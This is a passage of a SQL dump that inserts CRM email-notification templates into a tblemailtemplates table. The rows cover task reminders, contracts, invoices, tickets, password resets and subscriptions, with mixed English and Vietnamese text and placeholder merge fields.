(27, 'tasks', 'task-deadline-notification', 'english', 'Task Deadline Reminder - Sent to Assigned Members', 'NHẮC NHỞ - thời hạn nhiệm vụ | {companyname}', 'Hi {staff_firstname}&nbsp;{staff_lastname}<br /><br />Đ&acirc;y l&agrave; một email tự động từ {companyname}.<br /><br />Nhiệm vụ ph&acirc;n c&ocirc;ng&nbsp;<strong>{task_name}</strong> đến hạn ch&oacute;t <strong>{task_duedate}</strong>. <br />Nhiệm vụ n&agrave;y vẫn chưa kết th&uacute;c.<br /><br />Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: <a href=\"{task_link}\">{task_name}</a><br /><br />Kind Regards,<br />{dark_logo_image_with_url}<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(28, 'contract', 'send-contract', 'english', 'Send Contract to Customer', 'Contract - {contract_subject}', '<p><span style=\"font-size: 12pt;\">Hi&nbsp;{contact_firstname}&nbsp;{contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">Please find the <a href=\"{contract_link}\">{contract_subject}</a> attached.<br /><br />Description: {contract_description}<br /><br /></span><span style=\"font-size: 12pt;\">Looking forward to hear from you.</span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span></p>', '{companyname} | CRM', '', 0, 0, 0),
(29, 'invoice', 'invoice-payment-recorded-to-staff', 'english', 'Invoice Payment Recorded (Sent to Staff)', 'Xác nhận thanh toán - WIT', '<span style=\"font-size: 12pt;\">Hi</span><br /><br /><span style=\"font-size: 12pt;\">Customer recorded payment for invoice <strong># {invoice_number}</strong></span><br /><br /><span style=\"font-size: 12pt;\">You can view the invoice on the following link: <a href=\"{invoice_link}\">{invoice_number}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(30, 'ticket', 'auto-close-ticket', 'english', 'Auto Close Ticket', 'Ticket Auto Closed', '<p><span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">Ticket {ticket_subject} has been auto close due to inactivity.</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Ticket #</strong>: <a href=\"{ticket_public_url}\">{ticket_id}</a></span><br /><span style=\"font-size: 12pt;\"><strong>Department</strong>: {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Priority:</strong> {ticket_priority}</span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span></p>', '{companyname} | CRM', '', 0, 1, 0),
(31, 'project', 'new-project-discussion-created-to-staff', 'english', 'New Project Discussion (Sent to Project Members)', 'New Project Discussion Created - {project_name}', '<p>Hi {staff_firstname}<br /><br />New project discussion created from <strong>{discussion_creator}</strong><br /><br /><strong>Subject:</strong> {discussion_subject}<br /><strong>Description:</strong> {discussion_description}<br /><br />You can view the discussion on the following link: <a href=\"{discussion_link}\">{discussion_subject}</a><br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(32, 'project', 'new-project-discussion-created-to-customer', 'english', 'New Project Discussion (Sent to Customer Contacts)', 'New Project Discussion Created - {project_name}', '<p>Hello {contact_firstname} {contact_lastname}<br /><br />New project discussion created from <strong>{discussion_creator}</strong><br /><br /><strong>Subject:</strong> {discussion_subject}<br /><strong>Description:</strong> {discussion_description}<br /><br />You can view the discussion on the following link: <a href=\"{discussion_link}\">{discussion_subject}</a><br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(33, 'project', 'new-project-file-uploaded-to-customer', 'english', 'New Project File(s) Uploaded (Sent to Customer Contacts)', 'New Project File(s) Uploaded - {project_name}', '<p>Hello {contact_firstname} {contact_lastname}<br /><br />New project file is uploaded on <strong>{project_name}</strong> from <strong>{file_creator}</strong><br /><br />You can view the project on the following link: <a href=\"{project_link}\">{project_name}</a><br /><br />To view the file in our CRM you can click on the following link: <a href=\"{discussion_link}\">{discussion_subject}</a><br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(34, 'project', 'new-project-file-uploaded-to-staff', 'english', 'New Project File(s) Uploaded (Sent to Project Members)', 'New Project File(s) Uploaded - {project_name}', '<p>Hello&nbsp;{staff_firstname}</p>\r\n<p>New project&nbsp;file is uploaded on&nbsp;<strong>{project_name}</strong> from&nbsp;<strong>{file_creator}</strong></p>\r\n<p>You can view the project on the following link: <a href=\"{project_link}\">{project_name}<br /></a><br />To view&nbsp;the file you can click on the following link: <a href=\"{discussion_link}\">{discussion_subject}</a></p>\r\n<p>Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(35, 'project', 'new-project-discussion-comment-to-customer', 'english', 'New Discussion Comment  (Sent to Customer Contacts)', 'New Discussion Comment', '<p><span style=\"font-size: 12pt;\">Hello {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">New discussion comment has been made on <strong>{discussion_subject}</strong> from <strong>{comment_creator}</strong></span><br /><br /><span style=\"font-size: 12pt;\"><strong>Discussion subject:</strong> {discussion_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Comment</strong>: {discussion_comment}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the discussion on the following link: <a href=\"{discussion_link}\">{discussion_subject}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span></p>', '{companyname} | CRM', '', 0, 1, 0),
(36, 'project', 'new-project-discussion-comment-to-staff', 'english', 'New Discussion Comment (Sent to Project Members)', 'New Discussion Comment', '<p>Hi {staff_firstname}<br /><br />New discussion comment has been made on <strong>{discussion_subject}</strong> from <strong>{comment_creator}</strong><br /><br /><strong>Discussion subject:</strong> {discussion_subject}<br /><strong>Comment:</strong> {discussion_comment}<br /><br />You can view the discussion on the following link: <a href=\"{discussion_link}\">{discussion_subject}</a><br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(37, 'project', 'staff-added-as-project-member', 'english', 'Staff Added as Project Member', 'New project assigned to you', '<p>Hi {staff_firstname}<br /><br />New project has been assigned to you.<br /><br />You can view the project on the following link <a href=\"{project_link}\">{project_name}</a><br /><br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(38, 'estimate', 'estimate-expiry-reminder', 'english', 'Estimate Expiration Reminder', 'Nhắc nhở hết hạn | Đề Xuất Báo Giá', '<p><span style=\"font-size: 12pt;\">Hello {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">The estimate with <strong># {estimate_number}</strong> will expire on <strong>{estimate_expirydate}</strong></span><br /><br /><span style=\"font-size: 12pt;\">You can view the estimate on the following link: <a href=\"{estimate_link}\">{estimate_number}</a></span><br />{project_name}<br />----------------------------------------</p>\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO</p>\r\n<p class=\"p1\">{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(39, 'proposals', 'proposal-expiry-reminder', 'english', 'Proposal Expiration Reminder', 'Proposal Expiration Reminder', '<p>Hello {proposal_proposal_to}<br /><br />The proposal {proposal_number}&nbsp;will expire on <strong>{proposal_open_till}</strong><br /><br />You can view the proposal on the following link: <a href=\"{proposal_link}\">{proposal_number}</a><br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(40, 'staff', 'new-staff-created', 'english', 'New Staff Created (Welcome Email)', 'Nhan vien moi da duoc tao', 'Hi {staff_firstname}<br /><br />You are added as member on our CRM.<br /><br />Please use the following logic credentials:<br /><br /><strong>Email:</strong> {staff_email}<br /><strong>Password:</strong> {password}<br /><br />Click <a href=\"{admin_url}\">here </a>to login in the dashboard.<br /><br />Best Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(41, 'client', 'contact-forgot-password', 'english', 'Forgot Password', 'Create New Password', '<h2>Create a new password</h2>\r\nForgot your password?<br /> To create a new password, just follow this link:<br /> <br /><a href=\"{reset_password_url}\">Reset Password</a><br /> <br /> You received this email, because it was requested by a {companyname}&nbsp;user. This is part of the procedure to create a new password on the system. If you DID NOT request a new password then please ignore this email and your password will remain the same. <br /><br /> {email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(42, 'client', 'contact-password-reseted', 'english', 'Password Reset - Confirmation', 'Your password has been changed', '<strong><span style=\"font-size: 14pt;\">You have changed your password.</span><br /></strong><br /> Please, keep it in your records so you don\'t forget it.<br /> <br /> Your email address for login is: {contact_email}<br /><br />If this wasnt you, please contact us.<br /><br />{email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(43, 'client', 'contact-set-password', 'english', 'Set New Password', 'Set new password on {companyname} ', '<h2><span style=\"font-size: 14pt;\">Setup your new password on {companyname}</span></h2>\r\nPlease use the following link to set up your new password:<br /><br /><a href=\"{set_password_url}\">Set new password</a><br /><br />Keep it in your records so you don\'t forget it.<br /><br />Please set your new password in <strong>48 hours</strong>. After that, you won\'t be able to set your password because this link will expire.<br /><br />You can login at: <a href=\"{crm_url}\">{crm_url}</a><br />Your email address for login: {contact_email}<br /><br />{email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(44, 'staff', 'staff-forgot-password', 'english', 'Forgot Password', 'Create New Password', '<h2><span style=\"font-size: 14pt;\">Create a new password</span></h2>\r\nForgot your password?<br /> To create a new password, just follow this link:<br /> <br /><a href=\"{reset_password_url}\">Reset Password</a><br /> <br /> You received this email, because it was requested by a <strong>{companyname}</strong>&nbsp;user. This is part of the procedure to create a new password on the system. If you DID NOT request a new password then please ignore this email and your password will remain the same. <br /><br /> {email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(45, 'staff', 'staff-password-reseted', 'english', 'Password Reset - Confirmation', 'Your password has been changed', '<span style=\"font-size: 14pt;\"><strong>You have changed your password.<br /></strong></span><br /> Please, keep it in your records so you don\'t forget it.<br /> <br /> Your email address for login is: {staff_email}<br /><br /> If this wasnt you, please contact us.<br /><br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(46, 'project', 'assigned-to-project', 'english', 'New Project Created (Sent to Customer Contacts)', 'New Project Created', '<p>Hello&nbsp;{contact_firstname}&nbsp;{contact_lastname}</p>\r\n<p>New project is assigned to your company.<br /><br /><strong>Project Name:</strong>&nbsp;{project_name}<br /><strong>Project Start Date:</strong>&nbsp;{project_start_date}</p>\r\n<p>You can view the project on the following link:&nbsp;<a href=\"{project_link}\">{project_name}</a></p>\r\n<p>We are looking forward hearing from you.<br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(47, 'tasks', 'task-added-attachment-to-contacts', 'english', 'New Attachment(s) on Task (Sent to Customer Contacts)', 'New Attachment on Task - {task_name}', '<span>Hi {contact_firstname} {contact_lastname}</span><br /><br /><strong>{task_user_take_action}</strong><span> added an attachment on the following task:</span><br /><br /><strong>Name:</strong><span> {task_name}</span><br /><br /><span>You can view the task on the following link: </span><a href=\"{task_link}\">{task_name}</a><br /><br /><span>Kind Regards,</span><br /><span>{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(48, 'tasks', 'task-commented-to-contacts', 'english', 'New Comment on Task (Sent to Customer Contacts)', 'New Comment on Task - {task_name}', '<span>Dear {contact_firstname} {contact_lastname}</span><br /><br /><span>A comment has been made on the following task:</span><br /><br /><strong>Name:</strong><span> {task_name}</span><br /><strong>Comment:</strong><span> {task_comment}</span><br /><br /><span>You can view the task on the following link: </span><a href=\"{task_link}\">{task_name}</a><br /><br /><span>Kind Regards,</span><br /><span>{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(49, 'leads', 'new-lead-assigned', 'english', 'New Lead Assigned to Staff Member', 'Khách hàng tiềm năng {lead_name}', '<p>Hello {lead_assigned}<br /><br />New lead is assigned to you.<br /><br /><strong>Lead Name:</strong>&nbsp;{lead_name}<br /><strong>Lead Email:</strong>&nbsp;{lead_email}<br /><span>Lead Link: </span><span class=\"pull-right\"><a href=\"#\" class=\"add_merge_field\">{lead_link}</a></span><br /><br />You can view the lead on the following link: <a href=\"{lead_link}\">{lead_name}</a><br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 0, 0),
(50, 'client', 'client-statement', 'english', 'Statement - Account Summary', 'Account Statement from {statement_from} to {statement_to}', 'Dear {contact_firstname} {contact_lastname}, <br /><br />Its been a great experience working with you.<br /><br />Attached with this email is a list of all transactions for the period between {statement_from} to {statement_to}<br /><br />For your information your account balance due is total:&nbsp;{statement_balance_due}<br /><br />Please contact us if you need more information.<br /><br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(51, 'ticket', 'ticket-assigned-to-admin', 'english', 'New Ticket Assigned (Sent to Staff)', 'Phiếu hỗ trợ mới - đã được chỉ định cho bạn', '<p><span style=\"font-size: 12pt;\">Hi</span></p>\r\n<p><span style=\"font-size: 12pt;\">Một y&ecirc;u cầu hỗ trợ mới đ&atilde; được chỉ định cho bạn.</span><br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n</strong>: {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Ph&ograve;ng ban</strong>: {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n</strong>: {ticket_priority}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn y&ecirc;u cầu:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem y&ecirc;u cầu tr&ecirc;n li&ecirc;n kết sau: <a href=\"{ticket_url}\">#{ticket_id}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span></p>', '{companyname} | CRM', '', 0, 1, 0),
(52, 'client', 'new-client-registered-to-admin', 'english', 'New Customer Registration (Sent to admins)', 'New Customer Registration', 'Hello.<br /><br />New customer registration on your customer portal:<br /><br /><strong>Firstname:</strong>&nbsp;{contact_firstname}<br /><strong>Lastname:</strong>&nbsp;{contact_lastname}<br /><strong>Company:</strong>&nbsp;{client_company}<br /><strong>Email:</strong>&nbsp;{contact_email}<br /><br />Best Regards', '{companyname} | CRM', '', 0, 0, 0),
(53, 'leads', 'new-web-to-lead-form-submitted', 'english', 'Web to lead form submitted - Sent to lead', '{lead_name} - Chúng tôi đã nhận được yêu cầu của bạn', 'Ch&agrave;o {lead_name}.<br /><br /><strong>Y&ecirc;u cầu của bạn, ch&uacute;ng t&ocirc;i đ&atilde; tiếp nhận.</strong><br /><br />Email n&agrave;y l&agrave; để cho bạn biết rằng ch&uacute;ng t&ocirc;i đ&atilde; nhận được y&ecirc;u cầu của bạn v&agrave; ch&uacute;ng t&ocirc;i sẽ li&ecirc;n hệ lại với bạn trong thời gian sớm nhất để cung cấp th&ecirc;m th&ocirc;ng tin.<br /><br />----------------------------------------<br />\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO<br /><span style=\"font-size: 12pt;\"></span>', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(54, 'staff', 'two-factor-authentication', 'english', 'Two Factor Authentication', 'Confirm Your Login', '<p>Hi {staff_firstname}</p>\r\n<p style=\"text-align: left;\">You received this email because you have enabled two factor authentication in your account.<br />Use the following code to confirm your login:</p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 18pt;\"><strong>{two_factor_auth_code}<br /><br /></strong><span style=\"font-size: 12pt;\">{email_signature}</span><strong><br /><br /><br /><br /></strong></span></p>', '{companyname} | CRM', '', 0, 1, 0),
(55, 'project', 'project-finished-to-customer', 'english', 'Project Marked as Finished (Sent to Customer Contacts)', 'Project Marked as Finished', '<p>Hello&nbsp;{contact_firstname}&nbsp;{contact_lastname}</p>\r\n<p>You are receiving this email because project&nbsp;<strong>{project_name}</strong> has been marked as finished. This project is assigned under your company and we just wanted to keep you up to date.<br /><br />You can view the project on the following link:&nbsp;<a href=\"{project_link}\">{project_name}</a></p>\r\n<p>If you have any questions don\'t hesitate to contact us.<br /><br />Kind Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(56, 'credit_note', 'credit-note-send-to-client', 'english', 'Send Credit Note To Email', 'Credit Note With Number #{credit_note_number} Created', 'Dear&nbsp;{contact_firstname}&nbsp;{contact_lastname}<br /><br />We have attached the credit note with number <strong>#{credit_note_number} </strong>for your reference.<br /><br /><strong>Date:</strong>&nbsp;{credit_note_date}<br /><strong>Total Amount:</strong>&nbsp;{credit_note_total}<br /><br /><span style=\"font-size: 12pt;\">Please contact us for more information.</span><br /> <br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(57, 'tasks', 'task-status-change-to-staff', 'english', 'Task Status Changed (Sent to Staff)', 'NHẮC NHỞ | Công việc phân công - WIT', '<span style=\"font-size: 12pt;\">Hi {staff_firstname}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>{task_user_take_action}</strong> nhiệm vụ được đ&aacute;nh dấu l&agrave; <strong>{task_status}</strong></span><br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n nhiệm vụ (c&ocirc;ng việc):</strong> {task_name}</span><br /><span style=\"font-size: 12pt;\"><strong>Due date:</strong> {task_duedate}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: <a href=\"{task_link}\">{task_name}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(58, 'tasks', 'task-status-change-to-contacts', 'english', 'Task Status Changed (Sent to Customer Contacts)', 'Task Status Changed', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>{task_user_take_action}</strong> marked task as <strong>{task_status}</strong></span><br /><br /><span style=\"font-size: 12pt;\"><strong>Name:</strong> {task_name}</span><br /><span style=\"font-size: 12pt;\"><strong>Due date:</strong> {task_duedate}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the task on the following link: <a href=\"{task_link}\">{task_name}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(59, 'staff', 'reminder-email-staff', 'english', 'Staff Reminder Email', 'You Have a New Reminder!', '<p>Hello&nbsp;{staff_firstname}<br /><br /><strong>You have a new reminder&nbsp;linked to&nbsp;{staff_reminder_relation_name}!<br /><br />Reminder description:</strong><br />{staff_reminder_description}<br /><br />Click <a href=\"{staff_reminder_relation_link}\">here</a> to view&nbsp;<a href=\"{staff_reminder_relation_link}\">{staff_reminder_relation_name}</a><br /><br />Best Regards<br /><br /></p>', '{companyname} | CRM', '', 0, 1, 0),
(60, 'contract', 'contract-comment-to-client', 'english', 'New Comment  (Sent to Customer Contacts)', 'New Contract Comment', 'Dear {contact_firstname} {contact_lastname}<br /> <br />A new comment has been made on the following contract: <strong>{contract_subject}</strong><br /> <br />You can view and reply to the comment on the following link: <a href=\"{contract_link}\">{contract_subject}</a><br /> <br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(61, 'contract', 'contract-comment-to-admin', 'english', 'New Comment (Sent to Staff) ', 'New Contract Comment', 'Hi {staff_firstname}<br /><br />A new comment has been made to the contract&nbsp;<strong>{contract_subject}</strong><br /><br />You can view and reply to the comment on the following link: <a href=\"{contract_link}\">{contract_subject}</a>&nbsp;or from the admin area.<br /><br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(62, 'subscriptions', 'send-subscription', 'english', 'Send Subscription to Customer', 'Đăng ký đã được tạo {companyname}', 'Hello&nbsp;{contact_firstname}&nbsp;{contact_lastname}<br /><br />We have prepared the subscription&nbsp;<strong>{subscription_name}</strong> for your company.<br /><br />Click <a href=\"{subscription_link}\">here</a> to review the subscription and subscribe.<br /><br />----------------------------------------<br />\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO</p>\r\n<p class=\"p1\"></p>', '{companyname} | CRM', '', 1, 0, 0),
(63, 'subscriptions', 'subscription-payment-failed', 'english', 'Subscription Payment Failed', 'Your most recent invoice payment failed', 'Hello&nbsp;{contact_firstname}&nbsp;{contact_lastname}<br /><br br=\"\" />Unfortunately, your most recent invoice payment for&nbsp;<strong>{subscription_name}</strong> was declined.<br /><br />This could be due to a change in your card number, your card expiring,<br />cancellation of your credit card, or the card issuer not recognizing the<br />payment and therefore taking action to prevent it.<br /><br />Please update your payment information as soon as possible by logging in here:<br /><a href=\"{crm_url}/login\">{crm_url}/login</a><br /><br />Best Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(64, 'subscriptions', 'subscription-canceled', 'english', 'Subscription Canceled (Sent to customer primary contact)', 'Your subscription has been canceled', 'Hello&nbsp;{contact_firstname}&nbsp;{contact_lastname}<br /><br />Your subscription&nbsp;<strong>{subscription_name} </strong>has been canceled, if you have any questions don\'t hesitate to contact us.<br /><br />It was a pleasure doing business with you.<br /><br />Best Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(65, 'subscriptions', 'subscription-payment-succeeded', 'english', 'Subscription Payment Succeeded (Sent to customer primary contact)', 'Subscription  Payment Receipt - {subscription_name}', 'Hello&nbsp;{contact_firstname}&nbsp;{contact_lastname}<br /><br />This email is to let you know that we received your payment for subscription&nbsp;<strong>{subscription_name}&nbsp;</strong>of&nbsp;<strong><span>{payment_total}<br /><br /></span></strong>The invoice associated with it is now with status&nbsp;<strong>{invoice_status}<br /></strong><br />Thank you for your confidence.<br /><br />Best Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(66, 'contract', 'contract-expiration-to-staff', 'english', 'Contract Expiration Reminder (Sent to Staff)', 'Contract Expiration Reminder', 'Hi {staff_firstname}<br /><br /><span style=\"font-size: 12pt;\">This is a reminder that the following contract will expire soon:</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Subject:</strong> {contract_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Description:</strong> {contract_description}</span><br /><span style=\"font-size: 12pt;\"><strong>Date Start:</strong> {contract_datestart}</span><br /><span style=\"font-size: 12pt;\"><strong>Date End:</strong> {contract_dateend}</span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(67, 'gdpr', 'gdpr-removal-request', 'english', 'Removal Request From Contact (Sent to administrators)', 'Data Removal Request Received', 'Hello&nbsp;{staff_firstname}&nbsp;{staff_lastname}<br /><br />Data removal has been requested by&nbsp;{contact_firstname} {contact_lastname}<br /><br />You can review this request and take proper actions directly from the admin area.', '{companyname} | CRM', '', 0, 1, 0),
(68, 'gdpr', 'gdpr-removal-request-lead', 'english', 'Removal Request From Lead (Sent to administrators)', 'Data Removal Request Received', 'Hello&nbsp;{staff_firstname}&nbsp;{staff_lastname}<br /><br />Data removal has been requested by {lead_name}<br /><br />You can review this request and take proper actions directly from the admin area.<br /><br />To view the lead inside the admin area click here:&nbsp;<a href=\"{lead_link}\">{lead_link}</a>', '{companyname} | CRM', '', 0, 1, 0),
(69, 'client', 'client-registration-confirmed', 'english', 'Customer Registration Confirmed', 'Your registration is confirmed', '<p>Dear {contact_firstname} {contact_lastname}<br /><br />We just wanted to let you know that your registration at&nbsp;{companyname} is successfully confirmed and your account is now active.<br /><br />You can login at&nbsp;<a href=\"{crm_url}\">{crm_url}</a> with the email and password you provided during registration.<br /><br />Please contact us if you need any help.<br /><br />Kind Regards, <br />{email_signature}</p>\r\n<p><br />(This is an automated email, so please don\'t reply to this email address)</p>', '{companyname} | CRM', '', 0, 0, 0),
(70, 'contract', 'contract-signed-to-staff', 'english', 'Contract Signed (Sent to Staff)', 'Customer Signed a Contract', 'Hi {staff_firstname}<br /><br />A contract with subject&nbsp;<strong>{contract_subject} </strong>has been successfully signed by the customer.<br /><br />You can view the contract at the following link: <a href=\"{contract_link}\">{contract_subject}</a>&nbsp;or from the admin area.<br /><br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(71, 'subscriptions', 'customer-subscribed-to-staff', 'english', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator)', 'Customer Subscribed to a Subscription', 'The customer <strong>{client_company}</strong> subscribed to a subscription with name&nbsp;<strong>{subscription_name}</strong><br /><br /><strong>ID</strong>:&nbsp;{subscription_id}<br /><strong>Subscription name</strong>:&nbsp;{subscription_name}<br /><strong>Subscription description</strong>:&nbsp;{subscription_description}<br /><br />You can view the subscription by clicking <a href=\"{subscription_link}\">here</a><br />\r\n<div style=\"text-align: center;\"><span style=\"font-size: 10pt;\">&nbsp;</span></div>\r\nBest Regards,<br />{email_signature}<br /><br /><span style=\"font-size: 10pt;\"><span style=\"color: #999999;\">You are receiving this email because you are either administrator or you are creator of the subscription.</span></span>', '{companyname} | CRM', '', 0, 1, 0),
(72, 'client', 'contact-verification-email', 'english', 'Email Verification (Sent to Contact After Registration)', 'Verify Email Address', '<p>Hello&nbsp;{contact_firstname}<br /><br />Please click the button below to verify your email address.<br /><br /><a href=\"{email_verification_url}\">Verify Email Address</a><br /><br />If you did not create an account, no further action is required</p>\r\n<p><br />{email_signature}</p>', '{companyname} | CRM', '', 0, 0, 0),
(73, 'client', 'new-customer-profile-file-uploaded-to-staff', 'english', 'New Customer Profile File(s) Uploaded (Sent to Staff)', 'Customer Uploaded New File(s) in Profile', 'Hi!<br /><br />New file(s) is uploaded into the customer ({client_company}) profile by&nbsp;{contact_firstname}<br /><br />You can check the uploaded files into the admin area by clicking <a href=\"{customer_profile_files_admin_link}\">here</a> or at the following link:&nbsp;{customer_profile_files_admin_link}<br /><br />{email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(74, 'staff', 'event-notification-to-staff', 'english', 'Event Notification (Calendar)', 'Upcoming Event - {event_title}', 'Hi {staff_firstname}! <br /><br />This is a reminder for event <a href=\\\"{event_link}\\\">{event_title}</a> scheduled at {event_start_date}. <br /><br />Regards.', '', '', 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(75, 'subscriptions', 'subscription-payment-requires-action', 'english', 'Credit Card Authorization Required - SCA', 'Important: Confirm your subscription {subscription_name} payment', '<p>Hello {contact_firstname}</p>\r\n<p><strong>Your bank sometimes requires an additional step to make sure an online transaction was authorized.</strong><br /><br />Because of European regulation to protect consumers, many online payments now require two-factor authentication. Your bank ultimately decides when authentication is required to confirm a payment, but you may notice this step when you start paying for a service or when the cost changes.<br /><br />In order to pay the subscription <strong>{subscription_name}</strong>, you will need to&nbsp;confirm your payment by clicking on the follow link: <strong><a href=\"{subscription_authorize_payment_link}\">{subscription_authorize_payment_link}</a></strong><br /><br />To view the subscription, please click at the following link: <a href=\"{subscription_link}\"><span>{subscription_link}</span></a><br />or you can login in our dedicated area here: <a href=\"{crm_url}/login\">{crm_url}/login</a> in case you want to update your credit card or view the subscriptions you are subscribed.<br /><br />Best Regards,<br />{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(76, 'invoice', 'invoice-due-notice', 'english', 'Invoice Due Notice', 'Your {invoice_number} will be due soon', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}<br /><br /></span>You invoice <span style=\"font-size: 12pt;\"><strong># {invoice_number} </strong>will be due on <strong>{invoice_duedate}</strong></span><br /><br /><span style=\"font-size: 12pt;\">You can view the invoice on the following link: <a href=\"{invoice_link}\">{invoice_number}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(77, 'estimate_request', 'estimate-request-submitted-to-staff', 'english', 'Estimate Request Submitted (Sent to Staff)', 'Yêu cầu Tư Vấn - Hỗ Trợ mới đã được gửi cho bạn', '<span>Ch&agrave;o bạn,&nbsp;</span><br /><br />{estimate_request_email} đ&atilde; gửi một y&ecirc;u cầu Tư Vấn - Hỗ Trợ th&ocirc;ng qua {estimate_request_form_name} Website c&ocirc;ng ty.<br /><br />Bạn c&oacute; thể xem y&ecirc;u cầu tại li&ecirc;n kết sau: <a href=\"{estimate_request_link}\">{estimate_request_link}</a><br /><br />==<br /><br />{estimate_request_submitted_data}<br /><br />Kind Regards,<br /><span>{email_signature}</span>', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(78, 'estimate_request', 'estimate-request-assigned', 'english', 'Estimate Request Assigned (Sent to Staff)', 'New Estimate Request Assigned', '<span> Hello {estimate_request_assigned},&nbsp;</span><br /><br />Estimate request #{estimate_request_id} has been assigned to you.<br /><br />You can view the request at the following link: <a href=\"{estimate_request_link}\">{estimate_request_link}</a><br /><br />Kind Regards,<br /><span>{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
